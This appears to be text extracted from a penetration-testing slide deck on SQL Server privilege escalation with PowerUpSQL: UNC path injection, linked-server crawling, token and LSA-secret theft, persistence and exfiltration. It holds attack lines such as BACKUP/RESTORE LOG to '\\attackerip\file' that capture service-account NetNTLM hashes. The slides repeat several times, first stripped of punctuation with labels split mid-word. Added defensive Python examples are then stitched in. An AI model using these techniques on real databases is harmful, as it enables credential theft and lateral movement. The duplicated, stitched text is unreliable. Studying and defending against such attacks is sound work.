Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands.
2. OS commands run as the SQL Server service account.
3. Service accounts have sysadmin privileges by default.
4. Companies often use a single domain account to run hundreds of SQL Servers.
5. So if you get sysadmin on one server, you have it on all of them.
One account to rule them all.
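As an added example (not from the deck and not PowerUpSQL code), the Python below measures the blast radius the slide describes from the defender's side: given an inventory of SQL Server hosts and the accounts their services run as (the constructed records stand in for what Get-SQLInstanceDomain derives from MSSQLSvc service principal names), it groups hosts by domain service account and ranks the accounts shared by more than one host. Per-host accounts such as virtual service accounts and LocalSystem are kept out of the ranking because compromising one of them does not carry over to other servers. Host names and account names are constructed.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed inventory: (host, service account) pairs, in the shape a domain user
# could derive from MSSQLSvc service principal names. Not a real estate.
INVENTORY: List[Tuple[str, str]] = [
    ("sql01.corp.local", r"CORP\svc_sql"),
    ("sql02.corp.local", r"CORP\svc_sql"),
    ("sql03.corp.local", r"CORP\svc_sql"),
    ("sql04.corp.local", r"NT Service\MSSQLSERVER"),   # virtual account: per host
    ("sql05.corp.local", r"NT AUTHORITY\SYSTEM"),       # LocalSystem: per host
    ("sql06.corp.local", r"CORP\svc_hr_sql"),
    ("sql06.corp.local", r"CORP\svc_hr_sql"),           # second instance, same host
]

# Authorities whose accounts never span hosts, so they cannot be "shared".
PER_HOST_AUTHORITIES = {"NT SERVICE", "NT AUTHORITY", "BUILTIN"}


def is_domain_account(account: str) -> bool:
    """True for AUTHORITY\\name accounts whose authority is not machine-local."""
    if "\\" not in account:
        return False
    authority, _ = account.split("\\", 1)
    return authority.upper() not in PER_HOST_AUTHORITIES


def blast_radius(inventory: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map each domain service account to the sorted, de-duplicated hosts it runs on."""
    hosts_by_account: Dict[str, set] = defaultdict(set)
    for host, account in inventory:
        if is_domain_account(account):
            hosts_by_account[account.lower()].add(host.lower())
    return {acct: sorted(hosts) for acct, hosts in hosts_by_account.items()}


def shared_accounts(inventory: List[Tuple[str, str]]) -> List[Tuple[str, int]]:
    """Domain accounts used on more than one host, largest blast radius first."""
    radius = blast_radius(inventory)
    shared = [(acct, len(hosts)) for acct, hosts in radius.items() if len(hosts) > 1]
    return sorted(shared, key=lambda pair: (-pair[1], pair[0]))


if __name__ == "__main__":
    for account, count in shared_accounts(INVENTORY):
        print(f"{account}: sysadmin on {count} hosts if this one account is compromised")
```

The ranking is the list of accounts to split up first, or to move to per-host managed service accounts, since each entry is exactly the "one account to rule them all" the slide warns about.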
[Figure: Leveraging Shared MS SQL Server Service Accounts (four animation frames). Network zones: Internet, DMZ, Intranet. Nodes: LRA, HVA, LVA, LVA, ADS, HVA, and the attacker ("PURE EVIL", Captain Evil). Labels: ports 80 and 443; ports 1433 and 1434. Steps: 1 SQL Injection; 2 Execute local command via xp_cmdshell; 3 Access to HVA with shared domain service account; execute commands and gather data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges
Crawling SQL Server Links
Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT * FROM OpenQuery([SQLSERVER2], 'SELECT @@Version')
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
[Figure: Leveraging MS SQL Database links (four animation frames). Network zones: Internet, DMZ, Intranet. Nodes: LRA, HVA, LVA, ADS, DB1 (LVA), HVA, and the attacker ("PURE EVIL", Captain Evil). Labels: ports 80 and 443; ports 1433 and 1434; "DB Link with Least Privileges"; "DB Link with SA account". Steps: 1 SQL Injection; 2 Execute SQL queries and local commands on database servers via nested linked services. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen.
The max number of hops we've seen is 12.
The max number of servers crawled is 226.
Escalating Privileges: Crawling Server Links
Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/
Escalating Privileges: Crawling Server Links
Function / Description
Get-SQLServerLink: Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl: Crawls linked servers and supports SQL query and OS command execution
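The crawl that Get-SQLServerLinkCrawl performs is, at bottom, a breadth-first walk over the graph of linked servers. The Python below is an added example, not PowerUpSQL code, that runs that walk over a constructed link inventory (server, remote server, login the link authenticates with) so a defender can see how the hop depth and server count quoted in the stats arise, and which links in the reachable set are configured with a sysadmin login such as sa, those being the links that turn a low-privilege entry point into sysadmin on the far side. Server names, link logins and the set of sysadmin logins are all assumed; a real audit would confirm each remote login's role membership rather than trusting the name.

```python
from collections import deque
from typing import Dict, List, Tuple

# Constructed link inventory in the shape of Get-SQLServerLink output reduced to
# (remote server, login the link authenticates with). Not a real environment.
LINKS: Dict[str, List[Tuple[str, str]]] = {
    "DB1": [("DB2", "linkuser"), ("DB3", "sa")],
    "DB2": [("DB1", "linkuser"), ("DB4", "linkuser")],
    "DB3": [("DB5", "sa")],
    "DB4": [],
    "DB5": [("DB1", "sa")],   # link back to the entry point: a cycle
}

# Logins assumed to hold sysadmin on the remote side (constructed).
SYSADMIN_LOGINS = {"sa"}


def crawl_links(links: Dict[str, List[Tuple[str, str]]], start: str):
    """Breadth-first crawl. Returns (hops, path): the shortest hop count and the
    server sequence for every server reachable from `start`."""
    hops: Dict[str, int] = {start: 0}
    path: Dict[str, List[str]] = {start: [start]}
    queue = deque([start])
    while queue:
        current = queue.popleft()
        for remote, _login in links.get(current, []):
            if remote in hops:          # already visited: keeps cycles from looping
                continue
            hops[remote] = hops[current] + 1
            path[remote] = path[current] + [remote]
            queue.append(remote)
    return hops, path


def crawl_summary(links: Dict[str, List[Tuple[str, str]]], start: str) -> Tuple[int, int]:
    """(servers reached, maximum hop depth), the two numbers the deck's stats quote."""
    hops, _ = crawl_links(links, start)
    return len(hops), max(hops.values())


def sysadmin_links_reachable(links: Dict[str, List[Tuple[str, str]]], start: str):
    """Every link reachable from `start` that authenticates as a sysadmin login,
    as (source, remote, login, hop at which the remote is reached)."""
    hops, _ = crawl_links(links, start)
    findings = []
    for source in hops:
        for remote, login in links.get(source, []):
            if login in SYSADMIN_LOGINS:
                findings.append((source, remote, login, hops[source] + 1))
    return sorted(findings)


if __name__ == "__main__":
    reached, depth = crawl_summary(LINKS, "DB1")
    print(f"{reached} servers reachable from DB1, max depth {depth} hops")
    for src, dst, login, hop in sysadmin_links_reachable(LINKS, "DB1"):
        print(f"hop {hop}: {src} -> {dst} as {login} (sysadmin on {dst})")
```

Run against the sample graph, three of the five links are sysadmin links, and one of them (DB5 back to DB1) means a low-privilege foothold on DB1 can return to DB1 as sa after two hops; that loop is the pattern to look for when reviewing sys.servers output.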
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016: https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
Escalating Privileges: UNC Path Injection
So in summary...
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
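One way to catch the technique summarised above from the defender's side, as an added example rather than anything from the deck or from PowerUpSQL: capture BACKUP and RESTORE statements (SQL Server Audit or Extended Events can record them) and flag any whose TO DISK / FROM DISK target is a UNC path pointing at a host other than the approved backup shares, since that is the moment the service account is made to authenticate outbound. The Python below does that over constructed audit records in a simple timestamp|login|statement shape; the allowlist, logins, hosts and record format are all assumed.

```python
import re
from typing import List, NamedTuple, Optional, Set, Tuple

# Assumed allowlist of hosts that legitimately receive backups (constructed).
APPROVED_BACKUP_HOSTS: Set[str] = {"backupsrv01.corp.local"}

# Constructed audit records, "timestamp|login|statement". Not real logs.
SAMPLE_AUDIT: List[str] = [
    r"2016-11-08T10:00:01|CORP\svc_backup|BACKUP DATABASE [Sales] TO DISK = '\\backupsrv01.corp.local\sql\Sales.bak'",
    r"2016-11-08T10:05:42|CORP\jdoe|BACKUP LOG [TESTING] TO DISK = '\\10.0.0.99\file'",
    r"2016-11-08T10:05:43|CORP\jdoe|RESTORE LOG [TESTING] FROM DISK = '\\10.0.0.99\file'",
    r"2016-11-08T10:07:00|CORP\svc_backup|BACKUP DATABASE [Sales] TO DISK = 'D:\Backups\Sales.bak'",
    r"2016-11-08T10:09:15|CORP\jdoe|SELECT name FROM sys.databases",
]

# BACKUP/RESTORE {DATABASE|LOG} <db> {TO|FROM} DISK = '<path>'
STMT_RE = re.compile(
    r"^(?P<op>BACKUP|RESTORE)\s+(?:DATABASE|LOG)\s+\[?(?P<db>[^\]\s]+)\]?"
    r"\s+(?:TO|FROM)\s+DISK\s*=\s*'(?P<path>[^']+)'",
    re.IGNORECASE,
)
# Leading \\host\ of a UNC path.
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\")


class Finding(NamedTuple):
    ts: str
    login: str
    op: str
    db: str
    host: str


def parse_disk_target(stmt: str) -> Optional[Tuple[str, str, str]]:
    """(operation, database, disk path) for BACKUP/RESTORE ... DISK statements, else None."""
    m = STMT_RE.match(stmt.strip())
    if not m:
        return None
    return m.group("op").upper(), m.group("db"), m.group("path")


def unc_host(path: str) -> Optional[str]:
    """Host component of a \\\\host\\share path, lower-cased; None for local paths."""
    m = UNC_RE.match(path)
    return m.group("host").lower() if m else None


def detect_unc_injection(lines: List[str], approved: Set[str] = APPROVED_BACKUP_HOSTS) -> List[Finding]:
    """Flag BACKUP/RESTORE statements whose disk target is a UNC path to a non-approved host."""
    findings: List[Finding] = []
    for line in lines:
        ts, login, stmt = line.split("|", 2)
        parsed = parse_disk_target(stmt)
        if parsed is None:
            continue
        op, db, path = parsed
        host = unc_host(path)
        if host is None or host in approved:
            continue
        findings.append(Finding(ts, login, op, db, host))
    return findings


if __name__ == "__main__":
    for f in detect_unc_injection(SAMPLE_AUDIT):
        print(f"{f.ts} {f.login} {f.op} [{f.db}] -> \\\\{f.host}")
```

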